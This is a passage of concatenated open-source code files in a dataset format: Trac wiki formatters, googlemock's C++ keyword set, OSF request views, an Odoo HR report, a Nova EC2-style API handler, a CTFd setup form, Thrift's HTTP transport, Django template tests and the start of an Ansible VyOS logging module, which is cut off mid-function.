# FIXME: compatibility code only for now
out = io.StringIO()
OneLinerFormatter(self.env, self.context).format(self.wikidom, out,
shorten)
return Markup(out.getvalue())
def format_to(env, flavor, context, wikidom, **options):
if flavor is None:
flavor = context.get_hint('wiki_flavor', 'html')
if flavor == 'oneliner':
return format_to_oneliner(env, context, wikidom, **options)
else:
return format_to_html(env, context, wikidom, **options)
def format_to_html(env, context, wikidom, escape_newlines=None):
if not wikidom:
return Markup()
if escape_newlines is None:
escape_newlines = context.get_hint('preserve_newlines', False)
return HtmlFormatter(env, context, wikidom).generate(escape_newlines)
def format_to_oneliner(env, context, wikidom, shorten=None):
if not wikidom:
return Markup()
if shorten is None:
shorten = context.get_hint('shorten_lines', False)
return InlineHtmlFormatter(env, context, wikidom).generate(shorten)
def extract_link(env, context, wikidom):
if not wikidom:
return Markup()
return LinkFormatter(env, context).match(wikidom)
# pre-0.11 wiki text to Markup compatibility methods
def wiki_to_outline(wikitext, env, db=None,
absurls=False, max_depth=None, min_depth=None, req=None):
""":deprecated: will be removed in 1.0 and replaced by something else"""
if not wikitext:
return Markup()
abs_ref, href = (req or env).abs_href, (req or env).href
from trac.web.chrome import web_context
context = web_context(req, absurls=absurls)
out = io.StringIO()
OutlineFormatter(env, context).format(wikitext, out, max_depth, min_depth)
return Markup(out.getvalue())
| bsd-3-clause |
ned14/MaidSafe | src/third_party_libs/googlemock/scripts/generator/cpp/keywords.py | 1157 | 2004 | #!/usr/bin/env python
#
# Copyright 2007 Neal Norwitz
# Portions Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""C++ keywords and helper utilities for determining keywords."""
__author__ = 'nnorwitz@google.com (Neal Norwitz)'
try:
# Python 3.x
import builtins
except ImportError:
# Python 2.x
import __builtin__ as builtins
if not hasattr(builtins, 'set'):
# Nominal support for Python 2.3.
from sets import Set as set
TYPES = set('bool char int long short double float void wchar_t unsigned signed'.split())
TYPE_MODIFIERS = set('auto register const inline extern static virtual volatile mutable'.split())
ACCESS = set('public protected private friend'.split())
CASTS = set('static_cast const_cast dynamic_cast reinterpret_cast'.split())
OTHERS = set('true false asm class namespace using explicit this operator sizeof'.split())
OTHER_TYPES = set('new delete typedef struct union enum typeid typename template'.split())
CONTROL = set('case switch default if else return goto'.split())
EXCEPTION = set('try catch throw'.split())
LOOP = set('while do for break continue'.split())
ALL = TYPES | TYPE_MODIFIERS | ACCESS | CASTS | OTHERS | OTHER_TYPES | CONTROL | EXCEPTION | LOOP
def IsKeyword(token):
return token in ALL
def IsBuiltinType(token):
if token in ('virtual', 'inline'):
# These only apply to methods, they can't be types by themselves.
return False
return token in TYPES or token in TYPE_MODIFIERS
| gpl-3.0 |
cslzchen/osf.io | api/requests/views.py | 4 | 6017 | from __future__ import unicode_literals
from rest_framework import generics
from rest_framework import permissions
from rest_framework.exceptions import NotFound
from api.actions.serializers import PreprintRequestActionSerializer
from api.base.views import JSONAPIBaseView
from api.base import permissions as base_permissions
from api.base.filters import ListFilterMixin
from api.base.utils import get_object_or_error
from api.requests.permissions import NodeRequestPermission, PreprintRequestPermission
from api.requests.serializers import NodeRequestSerializer, PreprintRequestSerializer
from framework.auth.oauth_scopes import CoreScopes
from osf.models import Node, NodeRequest, PreprintRequest, Preprint
class RequestMixin(object):
serializer_class = None
request_class = None
request_display_name = None
target_class = None
target_display_name = None
target_lookup_url_kwarg = None
request_lookup_url_kwarg = None
def __get_object(self, object_class, lookup_arg, display_name, check_object_permissions=True):
obj = get_object_or_error(
object_class,
self.kwargs[lookup_arg],
self.request,
display_name=display_name,
)
# May raise a permission denied
if check_object_permissions:
self.check_object_permissions(self.request, obj)
return obj
def get_request(self, check_object_permissions=True):
return self.__get_object(self.request_class, self.request_lookup_url_kwarg, self.request_display_name, check_object_permissions=check_object_permissions)
def get_target(self, check_object_permissions=True):
return self.__get_object(self.target_class, self.target_lookup_url_kwarg, self.target_display_name, check_object_permissions=check_object_permissions)
class NodeRequestMixin(RequestMixin):
serializer_class = NodeRequestSerializer
request_class = NodeRequest
request_display_name = 'node request'
target_class = Node
target_display_name = 'node'
target_lookup_url_kwarg = 'node_id'
request_lookup_url_kwarg = 'request_id'
class PreprintRequestMixin(RequestMixin):
serializer_class = PreprintRequestSerializer
request_class = PreprintRequest
request_display_name = 'preprint request'
target_class = Preprint
target_display_name = 'preprint'
target_lookup_url_kwarg = 'preprint_id'
request_lookup_url_kwarg = 'request_id'
class RequestDetail(JSONAPIBaseView, generics.RetrieveAPIView):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.ALWAYS_PUBLIC] # Actual scope checks are done on subview.as_view
required_write_scopes = [CoreScopes.NULL]
view_category = 'requests'
view_name = 'request-detail'
def get(self, request, *args, **kwargs):
request_id = self.kwargs['request_id']
if NodeRequest.objects.filter(_id=request_id).exists():
return NodeRequestDetail.as_view()(request._request, *args, **kwargs)
elif PreprintRequest.objects.filter(_id=request_id).exists():
return PreprintRequestDetail.as_view()(request._request, *args, **kwargs)
else:
raise NotFound
class NodeRequestDetail(JSONAPIBaseView, generics.RetrieveAPIView, NodeRequestMixin):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
NodeRequestPermission,
)
required_read_scopes = [CoreScopes.NODE_REQUESTS_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = NodeRequestSerializer
view_category = 'requests'
view_name = 'node-request-detail'
def get_object(self):
return self.get_request()
class PreprintRequestDetail(JSONAPIBaseView, generics.RetrieveAPIView, PreprintRequestMixin):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
PreprintRequestPermission,
)
required_read_scopes = [CoreScopes.PREPRINT_REQUESTS_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = PreprintRequestSerializer
view_category = 'requests'
view_name = 'preprint-request-detail'
def get_object(self):
return self.get_request()
class RequestActionList(JSONAPIBaseView, generics.ListAPIView):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.ACTIONS_READ]
required_write_scopes = [CoreScopes.NULL]
view_category = 'requests'
view_name = 'request-action-list'
def get(self, request, *args, **kwargs):
request_id = self.kwargs['request_id']
if PreprintRequest.objects.filter(_id=request_id).exists():
return PreprintRequestActionList.as_view()(request._request, *args, **kwargs)
else:
raise NotFound
class PreprintRequestActionList(JSONAPIBaseView, generics.ListAPIView, PreprintRequestMixin, ListFilterMixin):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
PreprintRequestPermission,
)
required_read_scopes = [CoreScopes.ACTIONS_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = PreprintRequestActionSerializer
view_category = 'requests'
view_name = 'preprint-request-action-list'
# supports MustBeModerator
def get_provider(self):
request_id = self.kwargs['request_id']
preprint_request = PreprintRequest.load(request_id)
if preprint_request:
return preprint_request.target.provider
raise NotFound
# overrides ListFilterMixin
def get_default_queryset(self):
return self.get_request().actions.order_by('-created').all()
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
| apache-2.0 |
BT-csanchez/hr | __unported__/hr_report_turnover/report/employee_turnover.py | 21 | 5031 | # -*- coding:utf-8 -*-
#
#
# Copyright (C) 2013 Michael Telahun Makonnen <mmakonnen@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from datetime import datetime
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as OE_DATEFORMAT
from report import report_sxw
class Parser(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context)
self.localcontext.update({
'get_hno': self.get_hno,
'get_tno': self.get_tno,
'get_start': self.get_start,
'get_end': self.get_end,
'get_hires': self.get_hires,
'get_terminations': self.get_terminations,
'get_total_terminations': self.get_sumt,
'get_total_hires': self.get_sumh,
})
self.start_date = False
self.end_date = False
self.hno = 0
self.tno = 0
self.hdepartment_id = False
self.tdepartment_id = False
self.sumh = 0
self.sumt = 0
def set_context(self, objects, data, ids, report_type=None):
if data.get('form', False) and data['form'].get('start_date', False):
self.start_date = data['form']['start_date']
if data.get('form', False) and data['form'].get('end_date', False):
self.end_date = data['form']['end_date']
return super(Parser, self).set_context(
objects, data, ids, report_type=report_type)
def get_start(self):
return datetime.strptime(self.start_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_end(self):
return datetime.strptime(self.end_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_hno(self, department_id):
if not self.hdepartment_id or self.hdepartment_id != department_id:
self.hdepartment_id = department_id
self.hno = 1
else:
self.hno += 1
return self.hno
def get_tno(self, department_id):
if not self.tdepartment_id or self.tdepartment_id != department_id:
self.tdepartment_id = department_id
self.tno = 1
else:
self.tno += 1
return self.tno
def get_hires(self, department_id, docount=False):
res = []
dStart = datetime.strptime(self.start_date, OE_DATEFORMAT)
dEnd = datetime.strptime(self.end_date, OE_DATEFORMAT)
department = self.pool.get('hr.department').browse(
self.cr, self.uid, department_id)
for ee in department.member_ids:
# if there are no contracts or more than one contract assume
# this is not a new employee
if len(ee.contract_ids) == 0 or len(ee.contract_ids) > 1:
continue
d = datetime.strptime(ee.contract_id.date_start, OE_DATEFORMAT)
if dStart <= d <= dEnd:
res.append({'name': ee.name,
'f_employee_no': ee.f_employee_no,
'hire_date': ee.contract_id.date_start})
if docount:
self.sumh += 1
return res
def get_terminations(self, department_id, docount=False):
res = []
seen_ids = []
term_obj = self.pool.get('hr.employee.termination')
term_ids = term_obj.search(
self.cr, self.uid, [('name', '>=', self.start_date),
('name', '<=', self.end_date), ])
for term in term_obj.browse(self.cr, self.uid, term_ids):
if term.employee_id.department_id:
dept_id = term.employee_id.department_id.id
elif term.employee_id.saved_department_id:
dept_id = term.employee_id.saved_department_id.id
else:
dept_id = False
if (
term.employee_id.id not in seen_ids
and dept_id == department_id
):
res.append({'name': term.employee_id.name,
'f_employee_no': term.employee_id.f_employee_no,
'termination_date': term.name})
seen_ids.append(term.employee_id.id)
if docount:
self.sumt += len(res)
return res
def get_sumh(self):
return self.sumh
def get_sumt(self):
return self.sumt
| agpl-3.0 |
movmov/cc | nova/endpoint/api.py | 2 | 11345 | #!/usr/bin/python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright [2010] [Anso Labs, LLC]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tornado REST API Request Handlers for Nova functions
Most calls are proxied into the responsible controller.
"""
import logging
import multiprocessing
import random
import re
import urllib
# TODO(termie): replace minidom with etree
from xml.dom import minidom
from nova import vendor
import tornado.web
from twisted.internet import defer
from nova import crypto
from nova import exception
from nova import flags
from nova import utils
from nova.endpoint import cloud
from nova.auth import users
FLAGS = flags.FLAGS
flags.DEFINE_integer('cc_port', 8773, 'cloud controller port')
_log = logging.getLogger("api")
_log.setLevel(logging.DEBUG)
_c2u = re.compile('(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))')
def _camelcase_to_underscore(str):
return _c2u.sub(r'_\1', str).lower().strip('_')
def _underscore_to_camelcase(str):
return ''.join([x[:1].upper() + x[1:] for x in str.split('_')])
def _underscore_to_xmlcase(str):
res = _underscore_to_camelcase(str)
return res[:1].lower() + res[1:]
class APIRequestContext(object):
def __init__(self, handler, user, project):
self.handler = handler
self.user = user
self.project = project
self.request_id = ''.join(
[random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-')
for x in xrange(20)]
)
class APIRequest(object):
def __init__(self, controller, action):
self.controller = controller
self.action = action
def send(self, context, **kwargs):
try:
method = getattr(self.controller,
_camelcase_to_underscore(self.action))
except AttributeError:
_error = ('Unsupported API request: controller = %s,'
'action = %s') % (self.controller, self.action)
_log.warning(_error)
# TODO: Raise custom exception, trap in apiserver,
# and reraise as 400 error.
raise Exception(_error)
args = {}
for key, value in kwargs.items():
parts = key.split(".")
key = _camelcase_to_underscore(parts[0])
if len(parts) > 1:
d = args.get(key, {})
d[parts[1]] = value[0]
value = d
else:
value = value[0]
args[key] = value
for key in args.keys():
if isinstance(args[key], dict):
if args[key] != {} and args[key].keys()[0].isdigit():
s = args[key].items()
s.sort()
args[key] = [v for k, v in s]
d = defer.maybeDeferred(method, context, **args)
d.addCallback(self._render_response, context.request_id)
return d
def _render_response(self, response_data, request_id):
xml = minidom.Document()
response_el = xml.createElement(self.action + 'Response')
response_el.setAttribute('xmlns',
'http://ec2.amazonaws.com/doc/2009-11-30/')
request_id_el = xml.createElement('requestId')
request_id_el.appendChild(xml.createTextNode(request_id))
response_el.appendChild(request_id_el)
if(response_data == True):
self._render_dict(xml, response_el, {'return': 'true'})
else:
self._render_dict(xml, response_el, response_data)
xml.appendChild(response_el)
response = xml.toxml()
xml.unlink()
_log.debug(response)
return response
def _render_dict(self, xml, el, data):
try:
for key in data.keys():
val = data[key]
el.appendChild(self._render_data(xml, key, val))
except:
_log.debug(data)
raise
def _render_data(self, xml, el_name, data):
el_name = _underscore_to_xmlcase(el_name)
data_el = xml.createElement(el_name)
if isinstance(data, list):
for item in data:
data_el.appendChild(self._render_data(xml, 'item', item))
elif isinstance(data, dict):
self._render_dict(xml, data_el, data)
elif hasattr(data, '__dict__'):
self._render_dict(xml, data_el, data.__dict__)
elif isinstance(data, bool):
data_el.appendChild(xml.createTextNode(str(data).lower()))
elif data != None:
data_el.appendChild(xml.createTextNode(str(data)))
return data_el
class RootRequestHandler(tornado.web.RequestHandler):
def get(self):
# available api versions
versions = [
'1.0',
'2007-01-19',
'2007-03-01',
'2007-08-29',
'2007-10-10',
'2007-12-15',
'2008-02-01',
'2008-09-01',
'2009-04-04',
]
for version in versions:
self.write('%s\n' % version)
self.finish()
class MetadataRequestHandler(tornado.web.RequestHandler):
def print_data(self, data):
if isinstance(data, dict):
output = ''
for key in data:
if key == '_name':
continue
output += key
if isinstance(data[key], dict):
if '_name' in data[key]:
output += '=' + str(data[key]['_name'])
else:
output += '/'
output += '\n'
self.write(output[:-1]) # cut off last \n
elif isinstance(data, list):
self.write('\n'.join(data))
else:
self.write(str(data))
def lookup(self, path, data):
items = path.split('/')
for item in items:
if item:
if not isinstance(data, dict):
return data
if not item in data:
return None
data = data[item]
return data
def get(self, path):
cc = self.application.controllers['Cloud']
meta_data = cc.get_metadata(self.request.remote_ip)
if meta_data is None:
_log.error('Failed to get metadata for ip: %s' %
self.request.remote_ip)
raise tornado.web.HTTPError(404)
data = self.lookup(path, meta_data)
if data is None:
raise tornado.web.HTTPError(404)
self.print_data(data)
self.finish()
class APIRequestHandler(tornado.web.RequestHandler):
def get(self, controller_name):
self.execute(controller_name)
@tornado.web.asynchronous
def execute(self, controller_name):
# Obtain the appropriate controller for this request.
try:
controller = self.application.controllers[controller_name]
except KeyError:
self._error('unhandled', 'no controller named %s' % controller_name)
return
args = self.request.arguments
# Read request signature.
try:
signature = args.pop('Signature')[0]
except:
raise tornado.web.HTTPError(400)
# Make a copy of args for authentication and signature verification.
auth_params = {}
for key, value in args.items():
auth_params[key] = value[0]
# Get requested action and remove authentication args for final request.
try:
action = args.pop('Action')[0]
access = args.pop('AWSAccessKeyId')[0]
args.pop('SignatureMethod')
args.pop('SignatureVersion')
args.pop('Version')
args.pop('Timestamp')
except:
raise tornado.web.HTTPError(400)
# Authenticate the request.
try:
(user, project) = users.UserManager.instance().authenticate(
access,
signature,
auth_params,
self.request.method,
self.request.host,
self.request.path
)
except exception.Error, ex:
logging.debug("Authentication Failure: %s" % ex)
raise tornado.web.HTTPError(403)
_log.debug('action: %s' % action)
for key, value in args.items():
_log.debug('arg: %s\t\tval: %s' % (key, value))
request = APIRequest(controller, action)
context = APIRequestContext(self, user, project)
d = request.send(context, **args)
# d.addCallback(utils.debug)
# TODO: Wrap response in AWS XML format
d.addCallbacks(self._write_callback, self._error_callback)
def _write_callback(self, data):
self.set_header('Content-Type', 'text/xml')
self.write(data)
self.finish()
def _error_callback(self, failure):
try:
failure.raiseException()
except exception.ApiError as ex:
self._error(type(ex).__name__ + "." + ex.code, ex.message)
# TODO(vish): do something more useful with unknown exceptions
except Exception as ex:
self._error(type(ex).__name__, str(ex))
raise
def post(self, controller_name):
self.execute(controller_name)
def _error(self, code, message):
self._status_code = 400
self.set_header('Content-Type', 'text/xml')
self.write('<?xml version="1.0"?>\n')
self.write('<Response><Errors><Error><Code>%s</Code>'
'<Message>%s</Message></Error></Errors>'
'<RequestID>?</RequestID></Response>' % (code, message))
self.finish()
class APIServerApplication(tornado.web.Application):
def __init__(self, user_manager, controllers):
tornado.web.Application.__init__(self, [
(r'/', RootRequestHandler),
(r'/services/([A-Za-z0-9]+)/', APIRequestHandler),
(r'/latest/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2009-04-04/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2008-09-01/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2008-02-01/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-12-15/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-10-10/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-08-29/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-03-01/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-01-19/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/1.0/([-A-Za-z0-9/]*)', MetadataRequestHandler),
], pool=multiprocessing.Pool(4))
self.user_manager = user_manager
self.controllers = controllers
| apache-2.0 |
Codefans-fan/odoo | addons/base_import_module/tests/test_module/__openerp__.py | 377 | 1290 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Test Module',
'category': 'Website',
'summary': 'Custom',
'version': '1.0',
'description': """
Test
""",
'author': 'OpenERP SA',
'depends': ['website'],
'data': [
'test.xml',
],
'installable': True,
'application': True,
}
| agpl-3.0 |
ajvpot/CTFd | CTFd/forms/setup.py | 2 | 2479 | from wtforms import (
FileField,
HiddenField,
PasswordField,
RadioField,
SelectField,
StringField,
TextAreaField,
)
from wtforms.fields.html5 import EmailField
from wtforms.validators import InputRequired
from CTFd.constants.themes import DEFAULT_THEME
from CTFd.forms import BaseForm
from CTFd.forms.fields import SubmitField
from CTFd.utils.config import get_themes
class SetupForm(BaseForm):
ctf_name = StringField(
"Event Name", description="The name of your CTF event/workshop"
)
ctf_description = TextAreaField(
"Event Description", description="Description for the CTF"
)
user_mode = RadioField(
"User Mode",
choices=[("teams", "Team Mode"), ("users", "User Mode")],
default="teams",
description="Controls whether users join together in teams to play (Team Mode) or play as themselves (User Mode)",
validators=[InputRequired()],
)
name = StringField(
"Admin Username",
description="Your username for the administration account",
validators=[InputRequired()],
)
email = EmailField(
"Admin Email",
description="Your email address for the administration account",
validators=[InputRequired()],
)
password = PasswordField(
"Admin Password",
description="Your password for the administration account",
validators=[InputRequired()],
)
ctf_logo = FileField(
"Logo",
description="Logo to use for the website instead of a CTF name. Used as the home page button.",
)
ctf_banner = FileField("Banner", description="Banner to use for the homepage.")
ctf_small_icon = FileField(
"Small Icon",
description="favicon used in user's browsers. Only PNGs accepted. Must be 32x32px.",
)
ctf_theme = SelectField(
"Theme",
description="CTFd Theme to use",
choices=list(zip(get_themes(), get_themes())),
default=DEFAULT_THEME,
validators=[InputRequired()],
)
theme_color = HiddenField(
"Theme Color",
description="Color used by theme to control aesthetics. Requires theme support. Optional.",
)
start = StringField(
"Start Time", description="Time when your CTF is scheduled to start. Optional."
)
end = StringField(
"End Time", description="Time when your CTF is scheduled to end. Optional."
)
submit = SubmitField("Finish")
| apache-2.0 |
pinterest/thrift | lib/py/src/transport/THttpClient.py | 20 | 6619 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from io import BytesIO
import os
import socket
import sys
import warnings
import base64
from six.moves import urllib
from six.moves import http_client
from .TTransport import TTransportBase
import six
class THttpClient(TTransportBase):
"""Http implementation of TTransport base."""
def __init__(self, uri_or_host, port=None, path=None):
"""THttpClient supports two different types constructor parameters.
THttpClient(host, port, path) - deprecated
THttpClient(uri)
Only the second supports https.
"""
if port is not None:
warnings.warn(
"Please use the THttpClient('http://host:port/path') syntax",
DeprecationWarning,
stacklevel=2)
self.host = uri_or_host
self.port = port
assert path
self.path = path
self.scheme = 'http'
else:
parsed = urllib.parse.urlparse(uri_or_host)
self.scheme = parsed.scheme
assert self.scheme in ('http', 'https')
if self.scheme == 'http':
self.port = parsed.port or http_client.HTTP_PORT
elif self.scheme == 'https':
self.port = parsed.port or http_client.HTTPS_PORT
self.host = parsed.hostname
self.path = parsed.path
if parsed.query:
self.path += '?%s' % parsed.query
try:
proxy = urllib.request.getproxies()[self.scheme]
except KeyError:
proxy = None
else:
if urllib.request.proxy_bypass(self.host):
proxy = None
if proxy:
parsed = urllib.parse.urlparse(proxy)
self.realhost = self.host
self.realport = self.port
self.host = parsed.hostname
self.port = parsed.port
self.proxy_auth = self.basic_proxy_auth_header(parsed)
else:
self.realhost = self.realport = self.proxy_auth = None
self.__wbuf = BytesIO()
self.__http = None
self.__http_response = None
self.__timeout = None
self.__custom_headers = None
@staticmethod
def basic_proxy_auth_header(proxy):
if proxy is None or not proxy.username:
return None
ap = "%s:%s" % (urllib.parse.unquote(proxy.username),
urllib.parse.unquote(proxy.password))
cr = base64.b64encode(ap).strip()
return "Basic " + cr
def using_proxy(self):
return self.realhost is not None
def open(self):
if self.scheme == 'http':
self.__http = http_client.HTTPConnection(self.host, self.port)
elif self.scheme == 'https':
self.__http = http_client.HTTPSConnection(self.host, self.port)
if self.using_proxy():
self.__http.set_tunnel(self.realhost, self.realport,
{"Proxy-Authorization": self.proxy_auth})
def close(self):
self.__http.close()
self.__http = None
self.__http_response = None
def isOpen(self):
return self.__http is not None
def setTimeout(self, ms):
if not hasattr(socket, 'getdefaulttimeout'):
raise NotImplementedError
if ms is None:
self.__timeout = None
else:
self.__timeout = ms / 1000.0
def setCustomHeaders(self, headers):
self.__custom_headers = headers
def read(self, sz):
return self.__http_response.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def __withTimeout(f):
def _f(*args, **kwargs):
orig_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(args[0].__timeout)
try:
result = f(*args, **kwargs)
finally:
socket.setdefaulttimeout(orig_timeout)
return result
return _f
def flush(self):
if self.isOpen():
self.close()
self.open()
# Pull data out of buffer
data = self.__wbuf.getvalue()
self.__wbuf = BytesIO()
# HTTP request
if self.using_proxy() and self.scheme == "http":
# need full URL of real host for HTTP proxy here (HTTPS uses CONNECT tunnel)
self.__http.putrequest('POST', "http://%s:%s%s" %
(self.realhost, self.realport, self.path))
else:
self.__http.putrequest('POST', self.path)
# Write headers
self.__http.putheader('Content-Type', 'application/x-thrift')
self.__http.putheader('Content-Length', str(len(data)))
if self.using_proxy() and self.scheme == "http" and self.proxy_auth is not None:
self.__http.putheader("Proxy-Authorization", self.proxy_auth)
if not self.__custom_headers or 'User-Agent' not in self.__custom_headers:
user_agent = 'Python/THttpClient'
script = os.path.basename(sys.argv[0])
if script:
user_agent = '%s (%s)' % (user_agent, urllib.parse.quote(script))
self.__http.putheader('User-Agent', user_agent)
if self.__custom_headers:
for key, val in six.iteritems(self.__custom_headers):
self.__http.putheader(key, val)
self.__http.endheaders()
# Write payload
self.__http.send(data)
# Get reply to flush the request
self.__http_response = self.__http.getresponse()
self.code = self.__http_response.status
self.message = self.__http_response.reason
self.headers = self.__http_response.msg
# Decorate if we know how to timeout
if hasattr(socket, 'getdefaulttimeout'):
flush = __withTimeout(flush)
| apache-2.0 |
barbuza/django | tests/template_tests/syntax_tests/test_verbatim.py | 521 | 1658 | from django.template import TemplateSyntaxError
from django.test import SimpleTestCase
from ..utils import setup
class VerbatimTagTests(SimpleTestCase):
@setup({'verbatim-tag01': '{% verbatim %}{{bare }}{% endverbatim %}'})
def test_verbatim_tag01(self):
output = self.engine.render_to_string('verbatim-tag01')
self.assertEqual(output, '{{bare }}')
@setup({'verbatim-tag02': '{% verbatim %}{% endif %}{% endverbatim %}'})
def test_verbatim_tag02(self):
output = self.engine.render_to_string('verbatim-tag02')
self.assertEqual(output, '{% endif %}')
@setup({'verbatim-tag03': '{% verbatim %}It\'s the {% verbatim %} tag{% endverbatim %}'})
def test_verbatim_tag03(self):
output = self.engine.render_to_string('verbatim-tag03')
self.assertEqual(output, 'It\'s the {% verbatim %} tag')
@setup({'verbatim-tag04': '{% verbatim %}{% verbatim %}{% endverbatim %}{% endverbatim %}'})
def test_verbatim_tag04(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('verbatim-tag04')
@setup({'verbatim-tag05': '{% verbatim %}{% endverbatim %}{% verbatim %}{% endverbatim %}'})
def test_verbatim_tag05(self):
output = self.engine.render_to_string('verbatim-tag05')
self.assertEqual(output, '')
@setup({'verbatim-tag06': '{% verbatim special %}'
'Don\'t {% endverbatim %} just yet{% endverbatim special %}'})
def test_verbatim_tag06(self):
output = self.engine.render_to_string('verbatim-tag06')
self.assertEqual(output, 'Don\'t {% endverbatim %} just yet')
| bsd-3-clause |
marratj/ansible | lib/ansible/modules/network/vyos/vyos_logging.py | 15 | 7782 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: vyos_logging
version_added: "2.4"
author: "Trishna Guha (@trishnaguha)"
short_description: Manage logging on network devices
description:
- This module provides declarative management of logging
on Vyatta Vyos devices.
notes:
- Tested against VYOS 1.1.7
options:
dest:
description:
- Destination of the logs.
choices: ['console', 'file', 'global', 'host', 'user']
name:
description:
- If value of C(dest) is I(file) it indicates file-name,
for I(user) it indicates username and for I(host) indicates
the host name to be notified.
facility:
description:
- Set logging facility.
level:
description:
- Set logging severity levels.
aggregate:
description: List of logging definitions.
state:
description:
- State of the logging configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure console logging
vyos_logging:
dest: console
facility: all
level: crit
- name: remove console logging configuration
vyos_logging:
dest: console
state: absent
- name: configure file logging
vyos_logging:
dest: file
name: test
facility: local3
level: err
- name: Add logging aggregate
vyos_logging:
aggregate:
- { dest: file, name: test1, facility: all, level: info }
- { dest: file, name: test2, facility: news, level: debug }
state: present
- name: Remove logging aggregate
vyos_logging:
aggregate:
- { dest: console, facility: all, level: info }
- { dest: console, facility: daemon, level: warning }
- { dest: file, name: test2, facility: news, level: debug }
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set system syslog global facility all level notice
"""
import re
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network_common import remove_default_spec
from ansible.module_utils.vyos import get_config, load_config
from ansible.module_utils.vyos import vyos_argument_spec
def spec_to_commands(updates, module):
commands = list()
want, have = updates
for w in want:
dest = w['dest']
name = w['name']
facility = w['facility']
level = w['level']
state = w['state']
del w['state']
if state == 'absent' and w in have:
